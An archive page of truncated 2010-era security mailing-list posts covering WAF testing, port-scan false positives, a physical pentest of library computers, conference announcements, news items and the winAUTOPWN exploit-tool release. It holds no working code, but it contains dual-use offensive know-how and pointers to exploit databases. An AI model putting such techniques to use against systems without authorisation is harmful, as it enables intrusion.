First and foremost I will commend your honesty. Unfortunately, the fear of
reprimand can often cloud this area so much that people begin lying to cover
themselves; which then means that resolutions are harder to achieve. This
candour is exactly what is needed when investigating and responding to an
incident. Also make sure you document everything you did and do (as much as
is reasonable).
I think you would still benefit from having an...
Penetration Testing — While this list is intended for "professionals", participants frequently disclose techniques and strategies that would be useful to anyone with a practical interest in security and network auditing.
Re: WAF Testing..suggestions??
bin4ry (Sep 01)
Hey False,
one thing you should keep in mind: While I was pentesting mod_security
and a bunch of commercial WAFs, I recognized that most of the products
work pretty well with popular assessment tools (w3af, etc.). They
detected most of the attacks. Afterwards I set up a vulnerable website
and tried to manually attack it. There was a huge difference: A lot of
manual attacks were not recognized. I guess this is because most of
those WAF vendors try...
Re: WAF Testing..suggestions??
Yiannis Koukouras (Sep 01)
Hi False,
You can also try Http Parameter Pollution (HPP) attacks
http://www.securitytube.net/HTTP-Parameter-Pollution-%28HPP%29-Attack-video.aspx
Cheers,
Ioannis (Yiannis) Koukouras
CISSP, CISA, CISM
MSc in Computer Systems Security
BEng in Electronic Engineering
http://www.linkedin.com/in/ikoukouras
Re: Pentesting ASP website with tinymce
Robin Wood (Sep 01)
Exploit DB is a good start:
http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=tinymce&filter_author=&filter_platform=0&filter_type=0&filter_port=&filter_osvdb=&filter_cve=
And Security Focus
http://www.securityfocus.com/vulnerabilities
It's better than some of the native speakers!
Robin
nullcon Goa dwitiya (2.0) Call For Papers
nullcon (Sep 01)
nullcon Dwitiya (2.0)
The Jugaad(hacking) Conference
nullcon is an initiative by null - The open security community.
Website:
http://nullcon.net
Calling all Jugaadus(hackers)
It's the time of the year when we welcome research done by the
community as paper submissions for nullcon.
So, sip your coffee, dust your debuggers, fire your tools, challenge
your grey cells and shoot us an email.
Tracks:
---------------
- Bakkar: 1 Hr Talks
-...
Re: Pentesting ASP website with tinymce
Justin Klein Keane (Sep 01)
Hello,
TinyMCE is a JavaScript based WYSIWYG editor, not a content management
system. TinyMCE can be configured to run independently of any dynamic
code, and doesn't present any security vulnerability by itself. TinyMCE
has had problems in the past with file manipulation that involved unsafe
dynamic scripting (such as PHP).
Justin Klein Keane, C|EH CEPT
http://www.MadIrish.net
Pentesting ASP website with tinymce
Luana C. Rocha (Aug 31)
Hi,
The company I work for is in the process of evaluating a new website.
They are not concerned about security, but with how easy it is to update
the website content.
At this moment the developer that is winning this evaluation is
proposing to use tinymce as a content manager.
I read about tinymce and I'm really concerned about our security.
Does anyone use tinymce? Can anyone point me to a good way to pentest
this site and how to enforce...
RE: Pentest - ISA server
Christopher M (Aug 31)
I've witnessed this sort of behavior when an Untangle box (www.untangle.com)
was in place in front of ISA acting as a unified threat management bridge.
It acts as a catch all for inbound traffic.
Christopher.
-----Original Message-----
From: listbounce () securityfocus com [mailto:listbounce () securityfocus com] On
Behalf Of Ravipriya Thushara
Sent: Sunday, August 29, 2010 11:09 PM
To: Boyd, Chad
Cc: Kurt M. John; <pen-test () securityfocus...
Re: Pentest - ISA server
Volker Tanger (Aug 30)
Greetings!
"Kurt M. John" <kurt.md.john () gmail com>:
What options did you use on NMAP?
By default it runs a SYN scan (-sS), and if the firewall or server
tested does some type of SYN-Flood-Protection, it will send SYN-ACK
packages without actually querying the host behind it (maybe adding
TCP-cookies).
By default NMAP will count SYN-ACK answers to SYN queries as open port.
Try running a connect scan (-sT) which runs through...
Re: Pentest - ISA server
TAS (Aug 30)
Hi,
Having 50000 of the 65535 ports open is highly unlikely. To me, the
result has a high number of false positives. To be really sure that the
ISA is exhibiting such a behavior, run nmap and wireshark and see to
it that the response is indeed coming from the ISA proxy and not from
any other device that is sitting in between your system and the ISA
proxy.
Hope that helps.
Cheers
TAS...
Re: Pentest - ISA server
Ravipriya Thushara (Aug 30)
I too think there is an IPS at the network boundary other than an ISA
server. That's why it drops connections in both directions (IPS
inspects both inbound and outbound traffic). I'm interested in what
has over 50000 open ports. I have no idea about it and why it is
doing so.
Re: Pentest - ISA server
Paul Melson (Aug 30)
ISA Server is a proxy firewall, so TCP port scanning (3-way or SYN)
will result in lots of false positives like what you're seeing.
Libraries in the US are required to comply with CIPA, so the ISA
Server's primary purpose is most likely to filter adult web content.
It may also support remote access to the library's network, so rather
than trying to phone home from a compromised workstation (that is
probably turned off at close and rebooted...
Re: Pentest - ISA server
Boyd, Chad (Aug 28)
Try scanning a Checkpoint 7.0+ system with the IPS blade running, and you're likely to see similar things.
Pentest - ISA server
Kurt M. John (Aug 28)
Hey guys,
I have a question but I wanted to share this part with you first. I'm
doing a pentest for a client (scope includes several places including a
library) and it's been all types of fun actually. Yesterday I posed as a
library patron. I went through about 3 library computers that all had
BIOS passwords on them but I finally found one that didn't. So I
rebooted the computer that had no BIOS password to BackTrack (installed
on a usb key) and...
Re: WAF Testing..suggestions??
Dotzero (Aug 27)
Try waffit - http://code.google.com/p/waffit/source/checkout
RE: WAF Testing..suggestions??
DucNguyen (Aug 27)
Hi False,
attacks/suspicious traffic towards the webserver from my client?
==> You can generate attack traffic with web assessment tools; recommended:
W3af, Websecurify. Acunetix is not recommended because it uses a fixed HTTP header, so the WAF
can easily detect and block it.
good to be the role of my test
You can try some images: OWASP WebGoat; WebDojo ...
Search for the NSA article: WAF testing procedure.
-------------------------------------------
Regards,...
Info Security News — Carries news items (generally from mainstream sources) that relate to security.
Iran's Cyber Army Hacks 1,000 US, British, French Gov't Websites
InfoSec News (Aug 31)
http://english.farsnews.com/newstext.php?nn=8906081424
FARS News Agency
2010-08-30
TEHRAN (FNA)- An Iranian cyber group announced that it has hacked more
than 1,000 important governmental websites of the US, Britain and France
in protest at their support and financial aids to anti-Iran terrorist
groups.
"To commemorate the Day of Campaign against Terrorism and the martyrdom
anniversary of (former Iranian President Mohammad Ali)...
Darpa's Star Hacker Looks to WikiLeak-Proof Pentagon
InfoSec News (Aug 31)
http://www.wired.com/dangerroom/2010/08/darpas-star-hacker-looks-to-wikileak-proof-the-pentagon/
By Spencer Ackerman
Danger Room
Wired.com
August 31, 2010
Tomorrow's WikiLeakers may have to be sneakier than just dumping
military docs onto a Lady Gaga disc. The futurists at Darpa are working
on a project that would make it harder for troops to funnel classified
material to WikiLeaks -- or to foreign governments. And that means if
you work...
State retiree data breached
InfoSec News (Aug 31)
http://www.delawareonline.com/article/20100831/NEWS02/8310324/State+retiree+data+breached
By J.L. MILLER
The News Journal
August 31, 2010
DOVER -- In a data breach that one security expert said could be worth
millions of dollars to scam artists, Aon Consulting, the state's
benefits consultant, inadvertently posted personal information of about
22,000 state retirees on the Web, potentially exposing them to identity
theft for the rest of...
HP Holds Navy Network 'Hostage' for $3.3 Billion
InfoSec News (Aug 31)
http://www.wired.com/dangerroom/2010/08/hp-holds-navy-network-hostage/
By Noah Shachtman
Danger Room
Wired.com
August 31, 2010
Someday, somehow, the U.S. Navy would like to run its networks -- maybe
even own its computers again. After 10 years and nearly $10 billion,
many sailors are tired of leasing their PCs, and relying on a private
contractor to operate most of their data systems. Troops are sick of
getting stuck with inboxes that hold...
Focus on Secrecy Could Hamper Pentagon's Cybersecurity Plans
InfoSec News (Aug 31)
http://threatpost.com/en_us/blogs/focus-secrecy-could-hamper-pentagons-cybersecurity-plans-083010
By Paul Roberts
Threatpost.com
08/30/2010
The former head of the Department of Homeland Security's Cyber Security
Division warns that the U.S. military's preoccupation with secrecy could
hamper efforts to get the upper hand in cyber security.
An article last week by the U.S Deputy Secretary of Defense put the U.S.
military's cybersecurity plans...
Obama to loosen rules on technology exports
InfoSec News (Aug 31)
http://www.washingtonpost.com/wp-dyn/content/article/2010/08/30/AR2010083004278.html
By Howard Schneider
Washington Post Staff Writer
August 30, 2010
The Obama administration is overhauling the decades-old rules for the
export of sensitive military and other technology, jettisoning what
industry groups criticize as an antiquated "Cold War" set of regulations
for a more streamlined approach.
After a year-long review by officials at...
[Dataloss Weekly Summary] Week of Sunday, August 22, 2010
InfoSec News (Aug 31)
========================================================================
Open Security Foundation - DataLossDB Weekly Summary
Week of Sunday, August 22, 2010
5 Incidents Added.
========================================================================
DataLossDB is a research project aimed at documenting known and reported data loss incidents world-wide. The Open
Security Foundation asks for contributions of new incidents and new data for...
IT Security Unleashes Employee Complaints
InfoSec News (Aug 31)
http://www.informationweek.com/news/security/client/showArticle.jhtml?articleID=227101732
By Mathew J. Schwartz
InformationWeek
August 30, 2010
For 12% of CIOs, hearing complaints from employees over IT security
measures -- specifically, limits on their access to certain types of
websites or networks while using the office network -- is a common
occurrence. Meanwhile, 29% of CIOs say such gripes are at least
"somewhat common."...
CALL FOR PARTICIPATION-3rd Summer School on Network and Information Security (NIS'10)
InfoSec News (Aug 29)
Forwarded from: Ioannis Askoxylakis <asko (at) ics.forth.gr>
**************************************************************************
SINCERE APOLOGIES IF YOU RECEIVE MULTIPLE COPIES OF THIS ANNOUNCEMENT
***************************************************************************
CALL FOR PARTICIPATION
3rd Summer School on Network and Information Security (NIS'10)
Jointly organized by ENISA and FORTH
13-17...
Pentagon considers preemptive strikes as part of cyber-defense strategy
InfoSec News (Aug 29)
http://www.washingtonpost.com/wp-dyn/content/article/2010/08/28/AR2010082803849.html
By Ellen Nakashima
Washington Post Staff Writer
August 28, 2010
The Pentagon is contemplating an aggressive approach to defending its
computer systems that includes preemptive actions such as knocking out
parts of an adversary's computer network overseas - but it is still
wrestling with how to pursue the strategy legally.
The department is developing a...
Audit finds computer misuse at state employment agency
InfoSec News (Aug 29)
http://www.charlotteobserver.com/2010/08/27/1645949/audit-finds-computer-misuse-at.html
By Michael Biesecker
newsobserver.com
Aug. 27, 2010
RALEIGH - Employees at the state agency tasked with helping unemployed
North Carolinians find jobs were instead using their government
computers to play games and burn copies of bootleg DVDs, a state audit
shows.
The Office of the State Auditor launched the investigation at the
Employment Security...
New DDoS Botnet Hits Nearly 200 Websites
InfoSec News (Aug 29)
http://www.darkreading.com/database_security/security/attacks/showArticle.jhtml?articleID=227100032
By Kelly Jackson Higgins
DarkReading
Aug 26, 2010
A new botnet built for knocking websites offline has attacked mostly
Chinese and some U.S. sites, according to researchers.
About 90 percent of the command and control servers running YoyoDdos,
the nickname given the botnet by researchers at Arbor Networks who have
been studying and tracking...
3 areas where FUD needs to stop
InfoSec News (Aug 29)
http://www.csoonline.com/article/606263/3-areas-where-fud-needs-to-stop
By Joan Goodchild
Senior Editor
CSO
August 26, 2010
There is a new breed of animal appearing in the infosec community,
according to Dr. Jimmy Blake, chief security officer for Mimecast, a
cloud-services company based in London, and host of the blog Cloud
Computing and Bad Behavior. The new breed is what he calls the
"attention monger" (he actually used a more...
Linux Advisory Watch: August 27th, 2010
InfoSec News (Aug 29)
+----------------------------------------------------------------------+
| LinuxSecurity.com Linux Advisory Watch |
| August 27th, 2010 Volume 11, Number 35 |
| |
| Editorial Team: Dave Wreski <dwreski () linuxsecurity com> |
| Benjamin D. Thomas <bthomas () linuxsecurity...
Gareth Williams: 'backroom boy' spy was really a high-flier
InfoSec News (Aug 29)
http://www.telegraph.co.uk/news/uknews/crime/7969595/Gareth-Williams-backroom-boy-spy-was-really-a-high-flier.html
By Gordon Thomas
Telegraph.co.uk
29 Aug 2010
The Government Communications Headquarters in Cheltenham is Britain's
last great secret. Now it is in the focus of intense speculation among
its stunned staff. Never before has one of their own been murdered. In
GCHQ's cafes, the seating area around the lawn at the core of the...
Firewall Wizards — Tips and tricks for firewall administrators
Online Binary Planting Exposure Test
Lists (Sep 02)
ACROS Security has made the Online Binary Planting Exposure Test publicly accessible
for the benefit of all Windows users. This test should make it easy for users and
administrators to assess their exposure to binary planting attacks originating from
the Internet.
URL: http://www.binaryplanting.com/test.htm
Note that this test is NOT meant to answer whether you're vulnerable (at this point
where so many binary planting vulnerabilities exist out...
Re: UPnP part of attack surface
ArkanoiD (Aug 31)
It was pretty obvious from the very beginning that UPnP is an evil gaping hole.
:-)
And actually I've never seen a reason to keep it enabled.
UPnP part of attack surface
travis+ml-firewalls (Aug 31)
http://it.slashdot.org/it/08/01/14/1319256.shtml
One reason I'm interested in an authenticated way to do firewall
rule changes with DFD...
Re: In search of Firewalls KPIs
pkc_mls (Aug 31)
On 8/12/2010 11:07 PM, saumitra prabhudesai wrote:
Hi,
Can you please describe a little bit more what you plan to do, which
models are involved, which scenarios, etc ?
The KPI are the same for several firewall vendors : cpu, memory, number
of sessions, throughput, etc.
Re: a cutting-edge open-source network security project
travis+ml-firewalls (Aug 21)
Let the heresy begin! ;-)
Well, I was thinking of packet scrubbing in particular, with min-ttl
restrictions, because that can wreak havoc with traceroute. Being
able to easily turn it off for an IP for a quick traceroute is handy.
Any good Boeing 747 can already get you where you need; why would
anyone be interested in a free solar-powered engine?
Also, not all adversaries are conducting network attacks; perhaps you
want to block people who...
Re: covert timing channel data
travis+ml-firewalls (Aug 21)
This is my timing side-channel link collection:
http://www.subspacefield.org/security/security_concepts/index.html#tth_sEc31.2.4
I should probably break that section up into remote & local, but I'm
already 3 levels deep :-)
I'd definitely check out "remote timing attacks are practical", I think
that one has the most information for your case.
You might want to check out Bernstein's AES attacks, or a statistician,
to characterise...
Re: covert timing channel data
Melissa Stockman (Aug 21)
Thanks Travis but again this is not the data that I'm looking for.
The timing attacks described in your link are based on a single malicious
entity extracting data from a non compromised system by looking at timing
information.
The type of covert channel that I'm simulating has two malicious entities (a
sender and a receiver). One residing on a higher level security system and
one residing on a lower level security system. The entity on the...
Ruxcon 2010 Final Call For Papers
cfp (Aug 21)
RUXCON 2010 FINAL CALL FOR PAPERS
Ruxcon would like to announce the final call for papers for the sixth annual Ruxcon conference.
This year the conference will take place over the weekend of 20th and 21st of November.
Ruxcon will be held at CQ, Melbourne, Australia.
The deadline for submissions is the 10th of October.
What is Ruxcon?
Ruxcon is the premier technical computer security conference within Australia. Ruxcon aspires to bring...
In search of Firewalls KPIs
Marcin Antkiewicz (Aug 21)
Saumitra,
KPIs are metrics. Good metrics should be Specific, Measurable,
Actionable, Relevant, and Timely (SMART people call it).
A simple way of looking at firewall metrics is by placing them into
environmental, operational and strategic categories.
Environmental measurements deal with power/cooling consumption, rack
footprint, cabling/media, location, power sources, etc.
Operational stats deal with capacity
(disk/CPU/states/licenses/interface...
Re: In search of Firewalls KPIs
saumitra prabhudesai (Aug 18)
Thank you very much Tim. I'll start with the following as of now.
Thanks,
Saumitra
--- On Tue, 17/8/10, Tim Eberhard <xmin0s () gmail com> wrote:
From: Tim Eberhard <xmin0s () gmail com>
Subject: Re: [fw-wiz] In search of Firewalls KPIs
To: "Firewall Wizards Security Mailing List" <firewall-wizards () listserv icsalabs com>
Date: Tuesday, 17 August, 2010, 9:18 AM
I would suggest monitoring the following:
Number of...
Re: In search of Firewalls KPIs
Tim Eberhard (Aug 17)
I would suggest monitoring the following:
Number of total sessions
Session Ramp rate
CPU (Flow and task)
Interface stats
Policy drops/screen drops
Temperatures
Depending on the model (higher end boxes) you also might want to monitor the
'get asic d' command. Traffic types greatly impact the capacity of these
boxes.
I hope this helps.
-Tim Eberhard
In search of Firewalls KPIs
saumitra prabhudesai (Aug 16)
Hi All,
I am in search of the essential KPIs to be monitored for Juniper Netscreen Firewalls. After the identification of these
KPIs, I want to go ahead for capacity planning & performance optimization of these firewalls. Any piece of advice will
help!
Thanks,
Saumitra
Re: Intranet or intranet?
Gautier . Rich (Aug 06)
While I've always spelled it as Intranet everywhere I've written it - I am now completely convinced that I have been in
the wrong for many, many years.
It is an intranet - not The Intranet. If you want to name it - then you can capitalize it.....e.g. Behmnet
Rich Gautier
Sr. Product Architect
Kadix Systems
Office: 571-226-8828
Cell: 703-231-2156
From: firewall-wizards-bounces () listserv icsalabs com [mailto:firewall-wizards-bounces ()...
Re: Intranet or intranet?
Brian Loe (Aug 06)
Depends on context. If you are writing "the intranet" then you would
not capitalize it. If, however, you are writing "Company ABC's
Intranet" then you would. The latter being a proper noun and such.
Re: Intranet or intranet?
John Morrison (Aug 06)
Jeff,
The noun internet means a network of networks. It is a group of
connected networks - an internetwork. The I in IP stands for
internet. The capitalisation of Internet is used for THE Internet. It
is a proper noun in this case. (See -
http://www.webster-dictionary.org/definition/internet
Which says "Internet - (Note: capital "I"). The Internet is the
largest internet (with a small "i") in the world)
Following...
IDS Focus — Technical discussion about Intrusion Detection Systems. You can also read the archives of a previous IDS list
CFP: Deadline Extended: SLAML'10
Mohror, Kathryn (Jun 18)
Workshop on Managing Systems via Log Analysis and Machine
Learning Techniques (SLAML '10)
=============================================
October 2-3, 2010
Vancouver, BC, Canada
(at OSDI)
http://www.usenix.org/events/slaml10/cfp/
=============================================
********...
Announcement: xtractr updates
pcapr (Jun 08)
Just a quick note to let you know that the lite version of xtractr can
now index up to 10 million packets or 1GByte of pcaps. This makes it
easy to grab large packet traces from a production network and perform
troubleshooting and forensics with just a few clicks. We have also
updated the live demo of xtractr to use the pcap from the Honeynet
Challenge #4 (VoIP). Can you answer the forensics questions?
http://www.pcapr.net/xtractr
If you are...
Performance measurement tool for IDS/IPS
wittybugz (Jun 01)
Hi All,
Is any tool available in the market (free or paid) for measuring performance of Host based IDS/IPS devices?
I want to measure performance for protocols like HTTP,FTP,SMB/RPC,DNS etc.
Thanks,
Prateek
Web App Security — Provides insights on the unique challenges which make web applications notoriously hard to secure, as well as attack methods including SQL injection, cross-site scripting (XSS), cross-site request forgery, and more.
nullcon Goa dwitiya (2.0) Call For Papers
nullcon (Sep 01)
nullcon Dwitiya (2.0)
The Jugaad(hacking) Conference
nullcon is an initiative by null - The open security community.
Website:
http://nullcon.net
Calling all Jugaadus(hackers)
It's the time of the year when we welcome research done by the
community as paper submissions for nullcon.
So, sip your coffee, dust your debuggers, fire your tools, challenge
your grey cells and shoot us an email.
Tracks:
---------------
- Bakkar: 1 Hr Talks
-...
Online Binary Planting Exposure Test
ACROS Security Lists (Sep 01)
ACROS Security has made the Online Binary Planting Exposure Test publicly accessible
for the benefit of all Windows users. This test should make it easy for users and
administrators to assess their exposure to binary planting attacks originating from
the Internet.
URL: http://www.binaryplanting.com/test.htm
Note that this test is NOT meant to answer whether you're vulnerable (at this point
where so many binary planting vulnerabilities exist out...
[HITB-Announce] HITB2010 SIGNINT Sessions
Hafez Kamal (Aug 26)
Hack In The Box is proud to announce a brand new lightning session
called HITB SIGINT (Signal Intelligence/Interrupt)! HITB SIGINT
sessions are designed to provide a quick 15 minute overview for
material and research that's up and coming - stuff that isn't quite
ready for the mainstream tracks of the conference but deserves a mention
nonetheless. Final year students who want to present their projects to
industry experts are also strongly...
Released SpyBHORemover 2.5
Nagareshwar Talekar (Aug 25)
Hi all,
SpyBHORemover 2.5 is released to public now. SpyBHORemover (previously
called BHORemover) is the [FREEWARE] advanced tool to explore and
eliminate malicious BHO's from the system.
http://securityxploded.com/bhoremover.php
More about SpyBHORemover:
--------------------------------------------
BHO stands for 'Browser Helper Objects' which are plugins written for
'Internet Explorer' to enhance its capabilities. Often this...
t2'10 Challenge to be released 2010-08-28 10:00 EEST
Tomi Tuominen (Aug 24)
Hi,
Since the dawn of our species (well 2005, if you want to be picky about
it) t2 has been granting free admission to the elite of their kind, the
winners of the t2 Challenges. Don’t be suckered in by all the cheap
imitations out there, their snooze-fest la-di-da dog and pony shows,
because t2 is back! And we’re pleased to announce the release of the
t2’10 Challenge!
Now is your chance to join the past elites (http://t2.fi/challenge/) by...
[OWASP] APPSEC BRAZIL 2010 - REGISTRATIONS OPEN!
Leonardo Buonsanti (Aug 20)
Greetings everyone!
We're proud to announce that OWASP's AppSec Brazil 2010 Conference
registrations are officially open!
Early bird offers are available! Hurry up!
This year we'll have keynotes by Robert 'Rsnake' Hansen and Jeremiah
Grossman and Samy Kamkar as a Special Speaker!
Registrations are available here:
http://www.owasp.org/index.php/AppSec_Brasil_2010#tab=Registration
All info about the event can be found at:...
Better Security Through Sacrificing Maidens
Pete Herzog (Aug 19)
Hi,
I thought that this might be an interesting read for web developers.
It outlines a major problem with modern security practice and suggests
how to address it.
https://www.infosecisland.com/blogview/6646-Better-Security-Through-Sacrificing-Maidens.html
Sincerely,
-pete.
Ruxcon 2010 Final Call For Papers
cfp (Aug 19)
RUXCON 2010 FINAL CALL FOR PAPERS
Ruxcon would like to announce the final call for papers for the sixth annual Ruxcon conference.
This year the conference will take place over the weekend of 20th and 21st of November.
Ruxcon will be held at CQ, Melbourne, Australia.
The deadline for submissions is the 10th of October.
What is Ruxcon?
Ruxcon is the premier technical computer security conference within Australia. Ruxcon aspires to bring...
Re: winAUTOPWN v2.3 Released
Brad Causey (Aug 11)
The comments are from folks that don't know what they are doing. My
understanding is that this tool isn't for newcomers to the security
realm, nor is the tool for script kiddies.
As with any open source security tool, use it with caution, and never
use anything you don't fully understand.
-Brad Causey
CISSP, MCSE, C|EH, CIFI, CGSP
http://www.owasp.org
Re: winAUTOPWN v2.3 Released
ghost (Aug 11)
Damning how? It's obviously a script kiddie tool, so that leaves...
The genius that doesn't realize his AV is going off on the included
exploits and thinks it's infected?
Re: winAUTOPWN v2.3 Released
Jamie Riden (Aug 11)
Well, metasploit is "full of viruses" by that criterion as well - if
your AV tool doesn't moan about something like this then you need a
new AV tool :)
Having said that, I haven't downloaded it and tried it myself, but do
it on an isolated VM if you're worried.
cheers,
Jamie
Re: winAUTOPWN v2.3 Released
Fred Concklin (Aug 09)
Comments prove to be damning.
http://www.darknet.org.uk/2009/04/winautopwn-windows-autohacking-tool/
"QUAKER DOOMER" <quakerdoomer () inbox lv> wrote:
winAUTOPWN v2.3 Released
QUAKER DOOMER (Aug 08)
Dear all,
This is to announce release of winAUTOPWN version 2.3
This version covers remote exploits up till July 2010.
A few web RFI exploits will be added in the next Unpolished Sita Release.
A complete list of all Exploits in winAUTOPWN is available in CHANGELOG.TXT
Also, in this version :
BSDAUTOPWN has been upgraded to version 1.1. This BSD equivalent for winAUTOPWN now contains
almost all exploits which exist in winAUTOPWN except for...
2nd. OWASP Ibero-American Web Applications Security Conference 2010 (IBWAS'10) - Call for Papers
Carlos Serrão (Aug 02)
2nd. OWASP Ibero-American Web-Applications Security Conference 2010 (IBWAS’10)
ISCTE – Lisbon University Institute
25th – 26th November 2010
Lisboa, Portugal
http://www.ibwas.com
Call for Papers
Introduction
There is a change in the information systems development paradigm. The emergence of Web 2.0 technologies led to the
extensive deployment and use of web-based applications and web services as a way to develop new and flexible...
[HITB-Ann] Reminder: HITB2010 Malaysia Call for Papers Closing August 9th
Hafez Kamal (Jul 29)
This is a reminder that the Call for Papers for Asia's largest network
security event, HITBSecConf2010 - Malaysia is closing on the 9th of August!
This will be a QUAD TRACK conference featuring 2 dedicated tracks
focusing on cutting edge attack and defense techniques, a track with
dedicated hands-on lab sessions and a brand new lightning talk segment!
HITB CFP: http://cfp.hackinthebox.org/
===
Venue: Crowne Plaza Mutiara Kuala Lumpur...
Daily Dave — This technical discussion list covers vulnerability research, exploit development, and security events/gossip. It was started by ImmunitySec founder Dave Aitel and many security luminaries participate. Many posts simply advertise Immunity products, but you can't really fault Dave for being self-promotional on a list named DailyDave.
Rooted CON 2011 - Call for Papers
Román Ramírez (Sep 02)
Rooted CON 2011 - Call for Papers
-=] About Rooted CON
Rooted CON is a security congress which will be held in Madrid (Spain)
from 3 to 5 March 2011, whose spectrum of participants ranges from
students to state forces and secret services, through professionals of
the security market, lawyers, or even technology enthusiasts (and others).
-=] Type of Presentations
The congress accepts two kinds of presentations:
- Fast talks: 20 minutes.
-...
Re: Commission on Cybersecurity for the 44th Presidency and your right to cyber (security)
Michal Zalewski (Sep 01)
Indeed. How about car analogies, though?
/mz
SILICAU Lightning Demo (Wireless key cracking)
Mark Wuergler (Sep 01)
List,
Today's lightning demo will take a look at the wireless key cracking
capabilities of SILICAU.
Come watch us crack WEP, WPA1/2, and LEAP authentication!
Immunity will be doing a Lightning Demo today, Wednesday September 1st at
3:00p EDT (UTC - 4), we expect the demo to last between 15 and 20
minutes. Space is limited to 20 and invites will be issued on a first
come / first served basis. Invites for the demo will be sent at
approximately...
Re: Commission on Cybersecurity for the 44th Presidency and your right to cyber (security)
Fyodor (Sep 01)
In China they've been pushing the Multi-Level Protection Scheme (MLPS),
which somewhat makes sense when it is not at the personal but at the
enterprise level (i.e. you don't want your enemy country's enterprises
to come and secure your critical infrastructure and plant backdoors as
they go :))
The comparison with medical industry is ridiculous. Not only the med.
industry doesn't serve its main purpose (healing), but there is also
one key difference: the...
Re: Commission on Cybersecurity for the 44th Presidency and your right to cyber (security)
Michal Zalewski (Sep 01)
If you look at the archives of attrition.org, I actually suspect that
the charlatan fraction is about as strong as always, and not
particularly threatening to the legitimate business; and, given that,
as that report sensibly acknowledges, even fairly reputable
certifications do very little to generate highly qualified security
personnel, I doubt any action along these lines would make much of a
difference.
The real problem seems to be that the...
Re: Commission on Cybersecurity for the 44th Presidency and your right to cyber (security)
Michal Zalewski (Sep 01)
Yeah, I remember that one.
Between this and the continued push for "private-public partnerships"
(i.e., companies letting the government assess their
cyber-preparedness, etc), I am getting vaguely uncomfortable with the
attention the industry is getting of recent - despite the fact that
little or nothing has changed in the last 5-6 years, too.
It's not as much that I suspect the government has questionable
motives, of course; this is...
Re: Commission on Cybersecurity for the 44th Presidency and your right to cyber (security)
dan (Sep 01)
<disclaimer>I serve on that CSIS Commission</disclaimer>
Certification is coming, like it or not. I do not like it,
but it is coming. The driver is a direct consequence of,
and a direct confirmation that, the demand for security
expertise exceeds the supply which makes the charlatan
fraction rise especially as legal liability looks ever
more likely to be serious. Before we have a long-winded
argument, take a look at
www.nbise.org...
Commission on Cybersecurity for the 44th Presidency and your right to cyber (security)
Michal Zalewski (Aug 31)
This is probably somewhat interesting; a prominent quote from this
paper, dissing security certifications, is making rounds for a while -
but the rest of the paper is actually pretty scary:
http://csis.org/files/publication/100720_Lewis_HumanCapital_WEB_BlkWhteVersion.pdf
In essence, looks like the commission is simultaneously trying to
criticize the current regime of security certifications (probably
rightly so), and - very bizarrely - use...
SILICAU Movie
dave (Aug 26)
You can watch Mark Hijack a twitter/facebook session here.
http://partners.immunityinc.com/movies/Lightning_Demo_SilicaU_01.mp4
The key thing isn't really that this is possible (I assume if you're on this list you
know it is possible). The key thing is that it's two clicks.
-dave
Ekoparty classes!
dave (Aug 25)
Immunity will be doing two classes at Ekoparty this September. You should sign up,
especially if you're going to go to Ekoparty (which you should)!
Breaking Windows
September 14th and 15th
Python for Hackers
September 13th and 14th
Realistically, both classes should be titled: "Things you should know that we had to
learn the hard way". That's what almost all classes at conferences should be titled,
except, in Ekoparty's case, in...
t2'10 Challenge to be released 2010-08-28 10:00 EEST
Tomi Tuominen (Aug 25)
Hi,
Since the dawn of our species (well 2005, if you want to be picky about
it) t2 has been granting free admission to the elite of their kind, the
winners of the t2 Challenges. Don’t be suckered in by all the cheap
imitations out there, their snooze-fest la-di-da dog and pony shows,
because t2 is back! And we’re pleased to announce the release of the
t2’10 Challenge!
Now is your chance to join the past elites (http://t2.fi/challenge/) by...
SOURCE Barcelona 2010 Speaker List
Christien Rioux (Aug 23)
SOURCE Barcelona
September 21-22, 2010
Museu Nacional D’art de Catalunya
www.sourceconference.com
Boston - Barcelona - Seattle
SOURCE brings computer and IT security professionals and practitioners
together in an intimate and personal environment to discuss the
security industry’s most important issues, technologies, and business
trends. SOURCE attendees experience two days of intense 50 minute
sessions taught by top security experts....
PAPER: Security Mitigations for Return-Oriented Programming Attacks
Piotr Bania (Aug 23)
ABSTRACT
With the discovery of new exploit techniques, new protection mechanisms are
needed as well. Mitigations like DEP (Data Execution Prevention) or ASLR
(Address Space Layout Randomization) created a significantly more difficult
environment for vulnerability exploitation. Attackers, however, have
recently developed new exploitation methods which are capable of bypassing
the operating system's security protection mechanisms. In this...
White Phosphorus
dave (Aug 20)
Boom! It's Friday, at 4pm, and no doubt you want to watch a short video of Alex
McGeorge demonstrating the White Phosphorus TCP forwarder and Wireshark exploit.
That movie is here!
http://partners.immunityinc.com/movies/Lightning_Demo_WP01.mp4
Enjoy!
-dave
Re: X11 -> Root? (Qubes square rooted)
Brad Spengler (Aug 19)
Hello list for lions,
Grab yourself your beverage of choice and some anticipatory popcorn;
this will take a while.
So every year or so we get some overly confident zealot shot down on DD
(any SELinux zealots still out there?) Going with the tide of
security, this year's program seems to center around a new topic:
virtualization, particularly from the person who brought us the only
100% undetectable (*) rootkit. The internet hype machine seems...
PaulDotCom — General discussion of security news, research, vulnerabilities, and the PaulDotCom Security Weekly podcast.
Re: LAN Virus outbreak Procedures
Craig Freyman (Sep 02)
How big is the environment?
On Thu, Sep 2, 2010 at 9:27 AM, Tyler Robinson <pcimpressions () gmail com>wrote:
Re: LAN Virus outbreak Procedures
Pat (Sep 02)
I used a notable pen drive. Boot Linux install f-prot for Linux. Mount and
scan the drives. This works great on root kits
Hey everyone just wondering what kinds of procedures you are using to
prevent and stop virus outbreaks on your local network after some genius end
user investigates child porn on local network PCs. Do most of you use
Microsoft's firewall with GP and just open exceptions for the applications
that need it or run another piece of...
Re: LAN Virus outbreak Procedures
Butturini, Russell (Sep 02)
I've had much success with VLANing the affected systems off from the rest of the network and deploying some kind of
local "cleanup" machine that's hardened to work on the remediation process.
From: pauldotcom-bounces () mail pauldotcom com [mailto:pauldotcom-bounces () mail pauldotcom com] On Behalf Of Tyler
Robinson
Sent: Thursday, September 02, 2010 10:28 AM
To: PaulDotCom Security Weekly Mailing List
Subject: [Pauldotcom] LAN...
LAN Virus outbreak Procedures
Tyler Robinson (Sep 02)
Hey everyone just wondering what kinds of procedures you are using to
prevent and stop virus outbreaks on your local network after some genius end
user investigates child porn on local network PCs. Do most of you use
Microsoft's firewall with GP and just open exceptions for the applications
that need it or run another piece of software. I have a massive infection
that I cannot track down; our ESET is catching them but my network is nothing
but...
Re: Brucon
Robin Wood (Sep 02)
This is the one we all stayed at last year
